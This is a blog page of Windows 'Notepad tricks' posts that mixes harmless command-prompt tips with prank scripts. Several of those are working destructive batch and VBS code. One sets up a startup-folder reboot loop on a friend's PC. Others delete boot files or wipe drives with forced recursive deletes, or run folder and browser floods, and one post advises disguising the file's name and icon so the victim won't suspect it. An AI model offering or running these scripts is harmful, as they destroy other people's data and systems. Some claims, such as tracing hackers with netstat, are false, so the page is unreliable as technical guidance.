Search This Blog

Pages

Header Ads Widget

Responsive Advertisement
Showing posts with label Notepad tricks. Show all posts
Showing posts with label Notepad tricks. Show all posts

Friday, 18 August 2017

Prank on friends: Restart their computer continously......

Hello guys
This trick will help to prank on your friends...
Simply paste this coding in notepad and save this as *.bat (ex: shut.bat).
...................................................................................................
@echo     off
echo message here
shutdown /r /t 40 /c "HAVE FUN"
....................................................................................................

 And the last step paste this file in following directory:-
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"


Now your freinds computer will restart every time in span of  40 seconds.

ANTIDOTE:
Simply save this line in notepad as antidote.bat
..........................................
shutdown /a
..........................................
Then after restart, fastly click this file to abort one time restart
And then delete this file from startup folder or given directory
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

WARNING:
Antidote file should be placed on desktop for quick action.
Try this trick at your own responsibility, this blog is not liable for any action caused by this trick.
For any help mail us or leave comment.

Like and Share if u enjoy it.....😎😎                    













Sunday, 24 August 2014

Some More cmd tricks

Command Prompt is the one of most powerful tools for the  Windows so in easy word it’s a GUI based operating system .most of the people ignore that but  with the help of command prompt you can do many think like hacking .so here are some most used full command’s .
Open your command prompt  then Go window then search simple cmd

 1.Watch THE ASCII version of a Star Wars movie



so for all who are big fan of star wars movie, so then it’s simple trick just enter in the command prompt then just type telnet towel.blinkenlights.nl.

2. Know your IP add, DNS Server add and a lot more

  
with the help of Command Prompt you can easily fine the IP ,DNS server , host name , node type IP routing and wins proxy just type the ipconfig /all

3. Know that if the any neighbors are using your Wi-Fi connection

You can find with the help of command prompt that someone using your internet follow these step
Command Prompt can let you know if someone is connected to your Local Area Connection and then using it. Just follow the steps. 

1) Open the browser and visit a http://192.168.18.1 or its depending on your router ip. 


2) Then Find a tabs that are mentions with the “Attached Device” or  like similar.


3) Now you can find the IP address,the computer name, and the MAC add 


4 ) now finally you can Compare it with those displayed by router in Step 2.then If you are notice that someone strange devices so  then you’re neighbor has been using your internet .so then in this case change your setting like password

4. If hacker is hacking your computer so the Trace the Hacker


If you are interested to find that hacker so then using the command prompt you can find the hacker so then just execute netstat –a so then it will show the computer name that was connected with your computer . so now you can find the person easily.

5. Use Abort a Command


If you any command can be stopped so then just enter ctrl + C then you can change you line easily.

6. Hack the Prompt Text.


if you interested to hack the command prompt title so then its easily hacked
just enter the prompt like this prompt hacked by Noman Ramzan



7. Some Function From the Command Prompt


So this is just function from the command prompt like just go in the command prompt and then left click on that then you can see that there are some function like Mark, copy, select, paste and find so with the help of this function you can copy, select, mark and paste easily

8. Get help for the command prompt

Well let’s say you don’t know about the some command of this so then you can take simply you enter the cd/? For help so then work easily

10. Chat with your Friends with Command Prompt 


Hello my reader now you can chat with your friends easily with this simple trick . so then you just need you friend IP and your command prompt
1.     Open the office word or notepad  and paste this code
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

      2.     Now save this file with the “messenger.bat” then open your command prompt.
      3.     Drag the file (.bat file) over to the CP and then press enter.
      4.     So then CP show you the messenger and user
      5.     So in the user field you just enter your friend IP
      6.     So after that just enter you message want to send your friend

So this is a simple trick to chat with the command prompt so start chatting with him or her 

There are also lots of commands of the CP so i will try to define in my next article.
Thanks for the reading if you have any problem so then you can ask me .

Thursday, 21 August 2014

Top 5 most dangerous notepad virus...(TRY AT QWN RISK)

SOME DANGEROUS AND DEADLY  TRICKS
[CAUTION]
  DO NOT TRY THESE FOR FUN!!
1. How to create more than 3,000 folders under a minute
1) Open your notepad and type
the following code.
@echo off
:top
md %random%

goto top
2) Save it as 1000.bat
@echo off makes your screen
appear blank but it is actually
making hundreds of folders.
md %random% is command that
creating folders with random
names.( md is a command to
make directory in ms-dos)
goto top – return the command
to :top, causes an infinite loop.
NOTE: The folders will get created
in the directory where you saved
the ”1000.bat” file.
The file might look suspicious to
your friends. So if you are
looking to fool your friends, then
change the file name and also
the icon so that he doesn’t
suspect the file to be a virus.
 ———————————————————————————
——————————————————–


2. How to Shutdown a computer forever?
Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

Save it as “shutdown-
forever.bat”. Just make sure it
has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU
WONT RECOVER BACK AFTER YOU
RUN IT !!!
This should shutdown the persons computer. It shuts it off once
and deletes the files needed to reboot and restart.So please, use
this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /
Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It
with Extension .cmd or .bat.

———————————————————————————
——————————————————–
3. How to Delete all your system
files with a small command!
Copy the following code into your
notepad and save it as a .bat
file.
del *.*
All your files in your hard disk will
vanish in less than 5mins.
———————————————————————————
——————————————————–
4. RAM crashing trick
open notepad and type
:A
start http://computer-tricks-corner.blogspot.in/
goto A
save with .bat extension.
Infinitely loops your browser to
open up http://computer-tricks-corner.blogspot.in/
———————————————————————————
——————————————————–
5. Crash a Computer System With

Nothing But a Link.
This is a javascript “exploit” , it
will hang/crash your system. It
basically floods you with an
infinite loop of mailto:xxx
windows. To cancel this (and you
have to move fast) kill the
process of your email client
before you run out of RAM. Every
instance occupies about 1000
bytes, if your victim is smart, he
better end the process As soon as
possible or he will be forced to
reboot his computer.
WARNING THIS LINK WILL CRASH
YOUR BROWSER OR WORSE, YOUR
COMPUTER !!!!
Click Here
———————————————————————————
——————————————————–
NOTE: Try at your own risk
WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
ENJOY!

How to create a funny virus that continiously eject cd/dvd drives

This trick will create a code which will continuously eject CD/DVD drives. If you put them back in, it will pop them out again untill u don't know how to stop it( explained blow the code " how to stop it" ). Copy this code and paste it in Notepad


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
and save it as cdrom.vbs or *.vbs

Double click to open this file and you will be impressed by this awesome trick.

How to stop it
  • Open task manager or use  ctrl+alt+del
  • click on process tab
  • select wscript.exe
  • click on end process.
enjoy.........




And please like and follow us.......

How to create folder floood .............

1. OPen notepad and paste the code below ....

                :start
                 md %random%
                 goto start

2. save it as *.bat extension.....
You have done .....

Monday, 18 August 2014

How to create folder without any name

It is very simple
1. Just create a new folder.
2. Right click on it and press rename button....
3. then press alt+0160.
4. Simple press enter and u have done....

Sunday, 17 August 2014

Removing Virus Using Command Prompt

Hello folks, today i am going to to tell you how to remove virus using command prompt. I know many antivirus are available to do this job but many of them fail to remove these suspicious virus files such as autorun.inf etc. Why don't we understand that we made tools for decreasing our efforts, tools can not defect us.
Now come to point, following steps can be used to remove a virus file using command prompt:


  1.  First, press Windows Button + r then type cmd in it and press enter.
  2. Open Infected drive such as write E: to go E drive.
  3. Now type dir/w/a . It will show all the files of the drive including hidden files.
  4. Locate your virus file name i am using AUTORUN.INF.
  5. Type command attrib  -r –a –s –h to remove attributes of corresponding file.
  6. Now type del virus name.exe t delete it, eg : del newfolder.exe
and you are done, you can also delete viruses by using following steps:

Syntax for rename is (rename filename.extension new name ,  for example: (rename autorun.inf virus) to rename autorun.inf file. Here I have renamed it by “virusfile”.

  1. Now you can access the defected drive without affecting the virus.
  2. To delete the renamed file go to the defected drive and select the file you renamed, and delete it.
You have deleted that virus successfully but sometimes virus resides in the Recycler folder.To locate this folder:

  1. Type cd recycler command.
  2. Again type dir/w/a  to locate all file of the folder.
  3. Identify malicious files and delete them using above commands.
Note: Make sure that no other processes being running while performing these actions.

:)

Unknown Bug in Microsoft Word


Microsoft word trick still works in latest versions of MS Word and Bill Gates still don’t know why it happens



Try it yourself: 
1. Open Microsoft word and type  =rand(200,99)
2. Hit enter and see what happens.


NOTE: It won’t hurt your system. 

Friday, 15 August 2014

5 Best Command prompt Tricks

Before moving futher with the Tricks, let me show you how to Open Command prompt in various Windows versions.
Press Win + R keys to open up RUN, type in CMD and press enter to open Command Prompt.

OR

Simply Search for CMD or Command prompt and click on it to open Command Prompt in your Windows PC

1. Change Colours in CMD:


By default CMD have Black Background, but you can change its Background Color and font color too. Follow the Below steps to Play with Colors in Command prompt.
Step 1: Open Command prompt
Step 2. Type in Color 3 to change the Font color to Green. Different Colors have thier own different Codes. here are some Codes that you can try and use
0 = Black
1 = Blue
2 = Green
3 = Aqua
4 = Red
5 = Purple
6 = Yellow
7 = White
8 = Gray
9 = Light Blue
A = Light Green
B = Light Aqua
C = Light Red
D = Light Purple
E = Light Yellow
F = Bright White
Step 3: To change the Background Color of your CMD, simply Right Click on Top of your CMD and choose Properties.
Step 4: Now Click on Colors tab to choose your favourite color as Background color.

2. Check your I.P address and more about your internet.


With the help of Command Prompt you can easily find your IP address and DNS servers, command prompt will also return a ton of information like your host name, primary DNS suffix, node type, whether IP Routing, Wins Proxy, and DHCP are enabled, your network adapter`s description, your physical(MAC) address.
Step 1: Open CMD
Step 2 : Type in ipconfig /all

This will show you all the details about your internet Connection just like that.

Wana Make Shutdown virus......(Warning- try at your qwn risk)

1.   open notepad and paste the code below -
        shutdown -r -t 20
2. save above file as .bat and then run it with cmd..

How to make your computer speak

1. Just simply open notepad and paste the below code......
           Dim Message, Speak
          Message=InputBox("Enter text","Speak")
          Set Speak=CreateObject("sapi.spvoice")
          Speak.Speak Message

2. Save the above file as *.vbs file .......